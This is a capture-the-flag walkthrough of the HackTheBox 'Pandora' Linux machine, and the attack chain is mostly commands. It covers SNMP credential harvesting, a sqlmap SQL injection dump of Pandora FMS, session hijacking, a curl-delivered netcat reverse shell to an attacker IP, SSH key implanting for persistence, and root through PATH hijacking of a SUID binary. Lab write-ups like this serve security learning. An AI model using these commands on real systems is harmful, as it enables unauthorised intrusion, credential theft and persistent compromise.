Pandora HackTheBox WalkThrough
This is Pandora HackTheBox machine walkthrough. In this writeup, I have demonstrated step-by-step how I rooted Pandora HackTheBox machine. Before starting let us know something about this machine. It is Linux OS box with IP address 10.10.11.136 and difficulty easy assigned by its maker.
First of all, connect your PC with HackTheBox VPN and make sure your connectivity with Pandora machine by pinging its IP 10.10.11.136. If all goes correct then start hacking. As usual, I started by scanning the machine. Scanning gives us an idea how we have to proceed further. Like, it helps in banner grabbing the services running over different ports and sometimes it helps in vulnerability assessment also. I have used $ nmap for this task and the result is given below: –
Scanning
$ sudo nmap -p- -oN full-tcp-scan.nmap --min-rate=10000 10.10.11.136
$ sudo nmap -p22,80 -oN script-scan.nmap -sC -sV 10.10.11.136
$ sudo nmap --top-ports 10 -sU -oN top-udp.nmap 10.10.11.136
$ sudo nmap -p161 -sU -sC -sV -T4 -oN udp-script.nmap 10.10.11.136
————SNIP————
Nmap full TCP scan revealed ports 22 and 80 as open. OpenSSH is running over port 22 and apache2 web server is running over port 80. Also, UDP scan on top 10 ports revealed port 161 as open and SNMP service is running over it. SNMP is bit unique let us explore over it.
Wikipedia, describes Simple Network Management Protocol (SNMP) as an Internet Standard protocol for collecting and organizing information about managed devices on IP networks and for modifying that information to change device behavior. It is widely used in network management for network monitoring. It exposes management data in the form of variables on the managed systems organized in a Management Information Base (MIB) which describes the system status and configuration.
Enumeration on Port 161
On further enumeration on port 161 using nmap's snmp scripts found credential daniel : HotelBabylon23.
$ sudo nmap -sU -p161 --script “snmp* and not snmp-brute” 10.10.11.136
———————SNIP———————
———————SNIP———————
You can also use metasploit’s auxiliary module auxiliary/scanner/snmp/snmp_enum for SNMP enumeration. It also performs the same task as nmap’s snmp scripts do.
msf6 > use auxiliary/scanner/snmp/snmp_enum
msf6 auxiliary(scanner/snmp/snmp_enum) > set RHOSTS 10.10.11.136
msf6 auxiliary(scanner/snmp/snmp_enum) > run
———————SNIP———————
———————SNIP———————
Let us use this [daniel: HotelBabylon23] credential to SSH into the pandora box.
Getting User Shell
$ ssh [email protected]
~HotelBabylon23
$ whoami && id
We have successfully logged in into Pandora box as user daniel. It has two users namely daniel & matt. User flag is only accessible to matt and root user therefore, when I tried to access it, it gave me Access Denied message. To capture the flag, we have to logged in as user matt. After some enumeration when I didn’t find anything interesting then simply checked all the listening ports on pandora box.
Checking the Listening Ports
$ ss -lnpt
Port number 53, 22, 3306 and 80 are listening. Ports 80 and 22 are listening as normal [because they can be accessed from outside the box]. On the other hand, ports 3306 & 53 are only accessible from localhost. Since we don’t have any credential so we can’t access them. I simply curled the IP 127.0.0.1 and found a URI /pandora_console/. This hinted me to check the URL http://127.0.0.1/pandora_console/. When I checked it, I found different content which was not accessible through the URL http://10.10.11.136/pandora_console/.
$ curl 127.0.0.1
To access this Pandora Console, we have to port forward port number 80 to our localhost [kali machine]. Since we have SSH credentials so can use it to perform local port forwarding.
Local Port Forwarding
$ ssh -L 80:127.0.0.1:80 [email protected]
~HotelBabylon23
After localport forwarding pandora_console is accessible through the URL http://127.0.0.1/pandora_console/.
Tried to login with Pandora FMS default credential admin : pandora and with some other combination of credentials but none of them worked. There is also the version of this FMS is present viz., v7.0NG.742_FIX_PERL2020.
Simply googled this version for vulnerabilities and found it is affected with many vulnerabilities namely SQL Injection, Malicious File Execution, Privilege Escalation, XSS and a lot more. Check articles this & this for more info. SQL Injection can be confirmed by the endpoint http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=1\.
Soon I got this vulnerability I dumped the Username and Password of all the users.
$ sqlmap -u http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=1 --dbs --batch --technique=EU --time-sec=30
$ sqlmap -u http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=1 -D pandora -T tusuario -C fullname,is_admin,password,email --dump --thread=10
Then tried to crack the hash using $ hashcat and wordlist rockyou.txt but it could not crack them. Then I dumped the session IDs of all the logged in user from the table tsessions_php and hijacked the session of user matt.
$ sqlmap -u http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=1 -D pandora --dbms=mysql -T tsessions_php --dump --thread=10 --risk=3
———————SNIP———————
Hijacking Session of Matt
Simply replace the PHPSESSID value with g80h3hf7j4u3js38pchlm445kn and then refresh the page. We can see we have successfully hijacked the session of matt and logged in successfully as matt.
Getting Shell as Matt
According to this post we can perform Remote Command Execution via the Events Feature.
Note: If we are getting user shell here then it will be of the privilege of the user matt because currently, we are logged in as matt.
Let us exploit and get user shell using the PoC given in this post.
On Kali Machine
$ curl -H "Cookie: PHPSESSID=g80h3hf7j4u3js38pchlm445kn" "http://127.0.0.1/pandora_console/ajax.php?page=include/ajax/events&perform_event_response=10000000&target=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|sh+-i+2%3E%261|nc+10.10.17.97+1234+%3E/tmp/f&response_id=1"
On Local Machine
$ nc -nvlp 1234
$ whoami && id
We have successfully got user shell with the privilege of user matt. Let us upgrade it to fully qualified Linux shell so that we can run more advanced Linux command through it.
Note: You will get access denied message as below if Session ID of matt user is expired. So, try to dump fresh session id from tsessions_php table and then use it to hijack matt’s session.
Upgrading Shell
$ python3 -c 'import pty;pty.spawn("/bin/bash")'$ ^Z # Ctrl+Z to background the shell
$ stty raw -echo
$ fg # Plus press 2 times enter to foreground the shell
$ export TERM=xterm
We have successfully upgraded the shell. Let us capture user flag.
Capture User Flag
$ cat /home/matt/user.txt
Privilege Escalation
To escalate the privilege to root we have to first find a Privilege Escalation Vector using which we can perform privilege escalation. We can find PrivEsc Vector either manually or using some post exploitation enumeration scripts like Linpeas.sh, LinEnum.sh and there are a lot more. Check this link on PayloadsAllTheThings. This time, I have used Linpeas.sh for this task.
Finding PrivEsc Vector
Linpeas.sh found a custom SUID binary pandora_backup in the directory /usr/bin/. SUID binary is that file which when executed by normal user is executed by the permission of its owner even if it is not owned by the normal user. For example, if any binary has given a SUID permission and that file is owned by root user so, when normal user executes that binary all the commands inside that file will be executed by root privilege.
Let us check who can execute pandora_backup by checking its permission.
$ ls -la /usr/bin/pandora_backup
pandora_backup has executable permission given to user matt. This binary can be used to escalate privilege by Path Hijacking if the Linux commands used inside this binary is not used with their absolute path. Let us check whether any Linux command is being used without its absolute path inside pandora_backup.
$ cat /usr/bin/pandora_backup
We found that $ tar command is used without its absolute path. We can use $ tar command to exploit this vulnerability and get root shell. When I tried to get shell by manipulating $ tar command I got root shell without much effort. So here our potential PrivEsc Vector is Privilege Escalation by Path Hijacking or Privilege Escalation by Custom SUID exploitation. Check HTB boxes with similar privilege escalation vector here and here.
Before privilege escalation we need to first get a persistent shell using SSH, only then our exploit will work. I don’t know why but when I was trying to get root using this current shell I got failed every time. This exploit worked only when I got a SSH shell of user matt by implanting my SSH public key in authorized_keys file of user matt. So let us implant our SSH public key into authorized_keys file.
Implanting SSH Keys
On Kali Machine
$ ssh-keygen # generate new ssh key pair
$ cat id_rsa.pub
Copy id_rsa.pub keys in your clipboard and then paste it into authorized_keys file of user matt. If authorized_keys find not present then create one as below.
On Pandora Machine
$ mkdir .ssh
$ cd .ssh/
$ echo "Your SSH public key here" >authorized_keys
$ cat authorized_keys
Getting Shell as Matt
$ chmod 400 id_rsa
$ ssh -i id_rsa [email protected]
$ whoami && id
We have successfully got a persistence shell of user matt. Let us get root shell by performing privilege escalation.
Getting Root Shell
To get root shell do the following.
$ cd /tmp
$ echo "/bin/bash" > tar
$ export PATH=$(pwd):$PATH
$ chmod +x tar
$ /usr/bin/pandora_backup
# whoami && id
We have successfully got root shell. let us capture root flag.
Capture Root Flag
# cat /root/root.txt
This was how I rooted to Pandora HackTheBox machine. Learnt a lot during this walkthrough. Hope you have also learnt some new things. Thanks for reading this writeup. Share your experience in the comment section. Want to give any suggestion about the writeup feel free to write us at [email protected]. Check out my latest articles at https://ethicalhacs.com/.
